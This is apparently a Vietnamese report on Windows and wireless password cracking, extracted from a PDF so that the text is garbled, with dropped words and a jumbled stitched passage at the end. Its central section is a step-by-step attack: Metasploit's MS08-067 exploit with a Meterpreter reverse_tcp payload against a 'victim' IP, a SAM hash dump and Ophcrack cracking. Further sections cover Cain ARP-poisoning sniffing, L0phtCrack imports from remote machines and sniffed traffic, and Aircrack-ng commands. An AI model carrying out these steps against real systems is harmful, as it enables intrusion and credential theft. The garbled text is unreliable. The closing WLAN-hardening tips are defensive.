Đang tải... (xem toàn văn)
Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi phục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng.Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi khởi chạy đĩa CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài khoản người dùng Windows và thực hiện quá trình khôi phục mật khẩu. Tất cả các bước thực hiện hoàn toàn là tự động.
Nguyễn Thiện Nhân Ophcrack phần mềm khôi phục mật Windows miễn phí tốt Đối với người trang bị hiểu biết hệ điều hành mà lần muốn khôi phục mật Ophcrack cơng cụ nhanh dễ dàng sử dụng Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật mất.Ophcrack cung cấp cho bạn file ISO miễn phí bạn ghi đĩa CD khởi chạy đĩa CD Khi chương trình Ophcrack chạy, bạn xác định vị trí tài khoản người dùng Windows thực q trình khơi phục mật Tất bước thực hoàn toàn tự động Cài đặt OPHCRACK Việc cài đặt Ophcrack tương đối dễ, nhiên có phần lựa chọn thành phần cài đặt cần lưu ý –Hình 1 Nguyễn Thiện Nhân Hình 1: Chọn compornents để cài đặt vào mục tables cho ophcrack Trên Hình 1, download, lựa chọn số lựa chọn sau: - Continue without install the table: Cài đặt có chương trình Ophcrack, khơngcó Rainbow Table - Download alphanumenic table from Internet (388MB-SSTI04-10K): cài đặt download Rainbow Table loại SSTI04-10K - Download alphanumenic table from Internet (733MB-SSTI04-5K): cài đặt download Rainbow Table loại SSTI04-5K - Install alphanumenic table from CD or DVD (388MB-SSTI04-10K): cài đặt Ophcrack sử dụng Rainbow Table loại SSTI04-10K từ CD DVD - Install alphanumenic table from CD or DVD (733MB-SSTI04-5K): cài đặt Ophcrack sử dụng Rainbow Table loại SSTI04-5K từ CD DVD Nguyễn Thiện Nhân Rainbow Table loại SSTI04-5K có kích thước 733MB dùng cho máy tính có RAM từ 512MB trở lên Rainbow Table loại SSTI04-10K có kích thước 388MB dùng cho máy tính RAM Nếu trường hợp bạn download riêng đĩa LiveCD, download Rainbow Table theo link đây, lựa chọn Continue without install the table Code: Rainbow Table loại SSTI04-10K (388MB) http://lasecwww.epfl.ch/SSTIC04-10k.zip Rainbow Table loại SSTI04-5K (733MB) http://lasecwww.epfl.ch/SSTIC04-5k.zip Sau cài đặt, chạy chương trình, giao diện Ophcrack Hình Hình 2: Giao diện Ophcrack Windows Nguyễn Thiện Nhân Trên hình 2, trước sử dụng, click vào nút Tables để chọn đường dẫn đến bảng Rainbow Table – hình Hình 3: Select ophcrack table Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau nhắp OK Kết hợp metasploit với ophcrack crack password window winxp sp2 Trong ví dụ dùng backtrack 4, đĩa backtrack có tích hợp sẵn metasploit ophcrack Sau bước để thực bước crack password window xp sp2 ta lợi dụng lỗi bảo mật “Microsoft Security Bulletin MS08-067 Microsoft cho Windows Server Service” để khai thác thông tin Đây lỗ hổng nghiêm trọng nằm dịch vụ Server Service RPC hệ điều hành Windows.Với lỗi này, Hacker hồn tồn điều khiển máy tính từ xa với quyền cao hệ thống Nguyễn Thiện Nhân Mức độ nguy hiểm: Rất cao Mô tả kỹ thuật Server Service dịch vụ cho phép máy tính cài đặt hệ điều hành Windows chia sẻ file, máy in,… qua mạng dịch vụ thiếu hệ điều hành Dịch vụ hỗ trợ giao thức RPC, có chức tiếp nhận xử lý yêu cầu muốn chuyển đổi đường dẫn (vídụ \\C\Program Files\ \Windows) định dạng đường dẫn Canonicalization (\\C\Windows) Tuy nhiên, trình xử lý khơng kiểm sốt độ dài đường dẫn yêu cầu xảy lỗi tràn đệm Như vậy, với việc thực yêu cầu RPC với đường dẫn có độ dài “quá khổ”, Hacker dễ dàng thực thi mã độc máy tính từ xa nhằm chiếm quyền điều khiển, cài đặt virus, ăn cắp thông tin… Các bước thực Bước 1: Khi khởi động backtrack Chúng ta mở console gõ lệnh theo cú pháp sau để chạy metasploit Nguyễn Thiện Nhân Theo hình ta sử dụng metasploit phiên Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử dụng lỗi bảo mật Bước3 : bước ta thực lệnh để cấu hình thuộc tính để chuẩn bị cho cơng chiếm quyền điều khiển Cú pháp : set payload windows/meterpreter/reverse_tcp //Meta-Interpreter advanced payload Muc đích để cung cấp tập lệnh để khai thác, công máy remote computers.Nó viết từ developers dạng shared object( DLL) files Meterpreter thành phần mở rộng thực thi nhớ, hoàn toàn khơng ghi lên đĩa nên Nguyễn Thiện Nhân tránh phát từ phần mềm chống virus Meterpreter cung cấp tập lệnh để khai thác remote computers set RHOST 192.168.1.1 // địa ip máy victim set LHOST 192.168.1.2 // địa ip máy công Khi chuẩn bị xong cấu hình ta có bảng với thong số hình Bước4: bước ta tiến hành khai thác lỗi Nguyễn Thiện Nhân Bước5 : Khi vào máy victim Ta dung lệnhh ashdump để hash files an window xp Bước6 :Ở bước thứ ta hash dump file sam win Ta copy đoạn hash dump vào file text Và lưu lại Nguyễn Thiện Nhân Bước7 :ta khởi động chương trình ophcrack GUI tiến hành crack mật Ta load file hash tạo từ bước vàovà nhấn nút crack Và đợi chờ kết chương trình trả Lưu ý :Khi sử dụng ophcrack phải có directories rainbow table Chúng ta download tables Link download :http://sourceforge.net/projects/ophcrack/files/tables/ Dưới hình ảnh dung phần mềm ophcrack để crack file hash Nguyễn Thiện Nhân Hình1 : load file hash copy Hình2 :Nhấn nút crack để bắt đầu crack mật file hash 10 Nguyễn Thiện Nhân chứng thực hộ chiếu tự động sử dụng chứng nhận kết nối với mục tiêu đặt tên giá trị bổ sung xác định tương lai Ứng dụng cần phải viết phép loại cấp chứng nhận họ không hiểu Nếu bạn sử dụng chức để liệt kê loại chứng nhận CRED_TYPE_DOMAIN_PASSWORD ví dụ, API không trở lại mật lưu trữ dạng văn rõ ràng Không phát triển người dùng tương tác với Chứng quản lý sử dụng ứng dụng "lưu trữ sử dụng tên mật khẩu" tìm thấy dưới: Start-> Settings-> Control Panel-> User Accounts-> Tài khoản%% -> Quản lý mật mạng 83 Nguyễn Thiện Nhân Như bạn thấy từ hình ảnh ứng dụng cho bạn biết mật lưu trữ vào hệ thống bạn Cách sử dụng Bằng cấp chứng nhận quản lý mật giải mã hộp thoại kích hoạt từ menu theo "Cơng cụ" nhấn nút cơng cụ tương đối Dialup Password Decoder Các Dial-Up mật giải mã cho thấy mật lưu Windows "Dial-Up Networking" thành phần RAS thông tin thường lưu trữ LSA Secrets "L $ _RasDefaultCredentials" "RasDialParams! "Trong tất thông số kết nối khác (số điện thoại, địa cư trú ip ) vào danh bạ tập tin ( Pbk) 84 Nguyễn Thiện Nhân 85 Nguyễn Thiện Nhân Các thông tin danh sách xuất vào tập tin văn cách nhấn vào "xuất khẩu" nút Cách sử dụng Dial-Up Password thoại giải mã kích hoạt từ menu theo "Cơng cụ" nhấn nút công cụ tương đối Enterprise Manager Password Decoder Cách sử dụng Cain Enterprise Manager hộp thoại mật giải mã kích hoạt từ menu theo "Cơng cụ" nhấn nút cơng cụ tương đối Protected Storage Password Manager Cách sử dụng Để biến nội dung cửa hàng, bạn nhấn phím "Insert" bàn phím nhấp vào biểu tượng với màu xanh + công cụ Việc bảo vệ lưu trữ Password Manager cho phép bạn loại bỏ không mong muốn / quên mật lưu trữ theo cách đơn giản: cần nhấp chuột phải vào tài nguyên danh sách chọn loại bỏ từ cửa sổ pop up menu 4.Các bước để Cack Pass Bằng Cain: 86 Nguyễn Thiện Nhân Bước 1: Sau install xong Cain khởi động Cain ta cần phải cấu hình Network Adapter cho Trên menu Cain chọn Configure > lựa chọn Network Adapter phù hợp Click Start Sniffer Bước 2: Lựa chọn Tab Sniffer > Scan MAC Addresses, danh sách địa IP mà chương trình Scan 87 Nguyễn Thiện Nhân Bước 3: Tab bên Tab Sniffer lựa chọn phần APR Tai khung APR ta thêm địa IP mà cần sniff Lựa chọn IP đích , IP nguồn 88 Nguyễn Thiện Nhân 89 Nguyễn Thiện Nhân Bước 4: Và click Start APR, ngồi chờ password Tổng quan L0ghtcrack cách sử dụng Như ta biết L0pht crack(LC3) cơng cụ bẻ khố cần thiết người Hacker Vậy bạn nhóm chúng tơi nghiên cứu cách sử dụng 90 Nguyễn Thiện Nhân Giới thiệu : _ LC3 giúp đỡ admin giữ an toàn cho mạng máy tính thơng qua việc quản lý tài khoản mật ngườI dùng Windows NT Window 2000 _ LC3 khôi phục mật tạo mật nhằm chống lạI truy nhập tài khoản bất hợp pháp Những hay LC3 : a ) Hỗ trợ cho Window 2000 : _Nó rút mật khơng mã hố tưởng chừng vơ giá trị từ hệ thống có sử dụng bảo vệ SYSKEY Microsoft b ) Có thể dùng cho tất mọI ngườI giới : _ Chỉ cần bạn có biết chút TA sử dụng dễ dàng c ) Phân tán việc cracking : _ LC3 giúp admin tăng tốc độ kiểm soát mật cần nhiều bởI việc chia thành phần đồng thờI chạy nhiều máy d ) Thao tác mật nhập : _ Bạn dễ dàng xoá mật mã hoá từ cửa sổ LC3 để tập trung quản lý mật mã mà bạn quản lý Những điều nên quan tâm bạn khai báo Wizard để bẻ mật nhanh : a ) Get Encrypted Passwords : 91 Nguyễn Thiện Nhân _ Chọn lựa lựa chọn đáng tin cậy bạn dùng chương trình thực máy bạn dùng ( khơng nên dùng thơng qua mạng ) _ Chọn lựa thứ dùng cho mạng network khác mà ngườI quản lý chúng cho ta đặc quyền ) Chú ý muốn dịch đựơc mã password( Hoặc ta hack đặc quyền vớI cách tiếp cận ta crack SYSKEY hiển thị mặc định Window 2000 , hệ thống NT vớI SYSKEY hiển thị _ Tuỳ chọn thứ khơi phục mật mã hố đĩa sửa chữa khẩn cấp NT ( Còn đốI vớI đĩa sửa chữa khẩn cấp Window 2000 khơng ) _ Tuỳ chọn cuốI dùng cho việc ngửI chộp password dạng “xui xẻo” ngang qua b ) Choose Cracking Method : _ Quick Password Audit : Chỉ cần phút để thực thử mọI từ nằm từ điển 26.000 từ , Nếu LC3 tìm thấy từ phù hợp vớI Password bạn khảo sát báo _ Common Password Audit : Nếu bạn nắm thói quen đạI đa số ngườI sử dụng Internet khu vực mà bạn muốn lấy pass bạn thêm từ vào từ điển bạn , nhiều thời gian để crack _ Strong Password Audit : Bắt đắc dĩ bạn phảI dùng phương pháp kết hợp để kiểm tra Hãy thử cho chúng kết hợp ký tự vớI số Cách lâu , nhiều ngày chưa 92 Nguyễn Thiện Nhân _ Custom Audit : Lựa chọn làm cho bạn định hình hướng kiểm tra xác VD bạn thay đổI file chứa từ điển chọn ký tự khác c ) Pick Reporting Style : Chỗ cho ta tuỳ chọn hiển thị pass tìm thấy , cách tốt bạn chọn hết ( Hơi tham tý phảI ) ) Sử dụng LC3 : a ) Thu nhặt mật : _ Ký hiệu Import From Local Machine : dùng để thu mật lộn xộn máy bạn sử dụng , bất chấp cất file SAM hay Active Directory _ Ký hiệu Import from Remote Registry : Trong vài trường hợp , bạn lấy mật mã từ mạng khác mạng cho bạn đăng ký liệu mạng Nhập vào tên máy hay địa Ip vào Import from Remote Registry rồI nhấn OK Bây usernames password load xuống LC3 _ File SAM : Trên hệ thống khơng sử dụng Active file SYSKEY bạn thu mật thông qua file cất giữ , file SAM Trong hệ điều hành chạy , bạn khởI động hệ điều hành khác để chép file SAM chương trình DOS ( chạy NTFSDOS : đề cập phần sau ) Hoặc Linux ( vớI hổ trợ NTFSDOS ) , file SAM thường cất giữ C:\ WinNT\system32\config Bạn lấy file SAM từ đĩa sửa chữa khẩn cấp Window NT , Window 2000 khơng hay cất file đĩa Hoặc 93 Nguyễn Thiện Nhân bạn lấy file SAM từ file sửa chữa ổ cứng hệ thống từ file backup Bạn load mật cần từ file SAM ( file SAM_ ) vào Import from SAM File rõ tên file , LC3 tự động ép chúng file SAM NT _ Import from the sniffer : Đây lựa chọn để crack pass mà chúng chộp có gói tin chứa pass qua chúng , ý trình bắt liệu làm việc tiếp hợp Ethernet có lẽ bị lỗi có firewall chạy máy ( mạng mà LC3 xâm nhập ) vớI LC3 _ PWDUMP3 : Đây trình tiện ích cho phép điều khiển liệu từ sở liệu password hệ thống bảo vệ SYSKEY Nó u cầu liệu từ phía admin khơng thoả hiệp để bảo mật cho network , phát sinh thêm file chứa liệu password mà ta lấy xuống cho Import from PWDUMP3 Tôi chưa thử để test cách crack nên chưa biết lợI hạI , bạn thử làm rùi đưa kết thử _ Import from LCS file :File LCS file cất giữ liệu phiên LC trước ( version 2/2.5 ) ( Viết tắt từ L0pht Crack session ) b ) Ý nghĩa ký hiệu Toolbar : Tơi lượt bỏ số ký hiệu nhìn vào bạn biết dùng để làm rồI _ Export : cho phép bạn xuất kết thời đến file tab-delimited , Nó có ích cho bạn trường hợp cần có nơi để bạn phân loạI sủa đổI kết , định dạng lạI chúng để crack in chúng 94 Nguyễn Thiện Nhân _ LC3 Wizard : Giúp bạn crack pass nhanh phù hợp với khai báo bạn _ Hide : cất dấu chương trình LC3 _ Begin Audit : Lệnh bắt đầu làm việc dựa tuỳ chọn bạn , hình lên cho bạn thấy tình trạng làm việc chúng _ Pause Audit :Tạm ngừng chương trình , tự động cất mật mà bạn crack tiếp tục chạy tiếp bạn ấn nút start audit lần _ Restart Audit : Chạy lạI chương trình bắt gặp cố _ Bốn tuỳ chọn : tự động giúp bạn phát vấn đề nan giảI tự động xác định cho bạn lựa chọn tốt để crack nhanh mật c ) Ghi : \* NTFSDOS : Là trình tiện ích miễn phí dùng để boot hệ thống từ đĩa mềm nhằm chiếm liệu đọc file ổ cứng bạn Nó dùng để xâm nhập vào liệu file SAM LC3 chịu thua việc có SYSKEY • Các phương pháp bảo mật cho mạng WLAN - Tắt access point: xài xong khơng có nhu cầu sử dụng mạng ta tắt điện Cách nghe cực đoan & buồn cười lại cách hiệu 100% 95 Nguyễn Thiện Nhân - Tắt chế độ SSID Broadcast: đa số AP cho phép ta tắt chế độ này, làm cho tiện ích wireless zero config winxp chương trình scan wifi netstumble khơng nhìn thấy mạng Tuy khơng ngăn số ct scan mạnh khác Kismet… - Lọc địa MAC: AP có tính lọc MAC client kết nối vào, có cách lọc cho phép cấm đ/c MAC Cách ko ngăn cao thủ tìm cách biết đ/c MAC client mạng ta & dễ dàng giả dạng chúng thông qua thay đổi địa MAC card mạng wifi - Mã hóa: WEP, WPA/WPA2 kiểu mã hóa thơng dụng AP, AP bạn hỗ trợ WEP xài key dài (thường 128bit), có hỗ trợ WPA xài key tối thiểu 128bit or 256bit Đa phần AP có support WPA xài kiểu WPA-PSK (pre-shared key passphare key), WPA2 mã hóa an tồn phải cần thêm server Radius nhằm mục đích xác thực Ta nên đặt khóa phức tạp tốt(bao gồm ký tự hoa thường, số & ký tự đặc biệt kết hợp lại), không nên dùng từ có nghĩa hay có từ điển, cracker dị mã khóa WPA dùng tự điển dò theo kiểu brute force attack Dùng cách làm giảm tốc độ đường truyền AP & client thiết bị nhiều lực để giải/mã hóa kiểu phức tạp - Dùng kiểu xác thực người dùng, tường lửa, mã hóa liệu đĩa & tập tin: cách khơng ngăn người khác dị khóa mã hóa wep/wpa Nhưng ngăn họ khơng xem can thiệp vô liệu lưu thông & tài nguyên mạng 96 Nguyễn Thiện Nhân 97 ... :http://sourceforge.net/projects/ophcrack/files/tables/ Dưới hình ảnh dung phần mềm ophcrack để crack file hash Nguyễn Thiện Nhân Hình1 : load file hash copy Hình2 :Nhấn nút crack để bắt đầu crack mật file hash 10... thực mã hóa WPA bảo mật mạnh WEP nhiều II.Aircrack-ng: II.1-Giới thiệu Aircrack-ng: Hầu nhắc tới Crack password Wireless nghĩ đến chương trình Aircrack Aircrack chương trình crack password 12 Nguyễn... [capture file(s) name] _aircrack-ng -r crackwpa wpa*.cap Aircrack bắt đầu lục lọi số gói liệu bắt để tìm khóa WEP III .Crack Password Wireless WEP Bằng Aircrack 1.Chuẩn bị : 1.1 .Phần cứng : 18 Nguyễn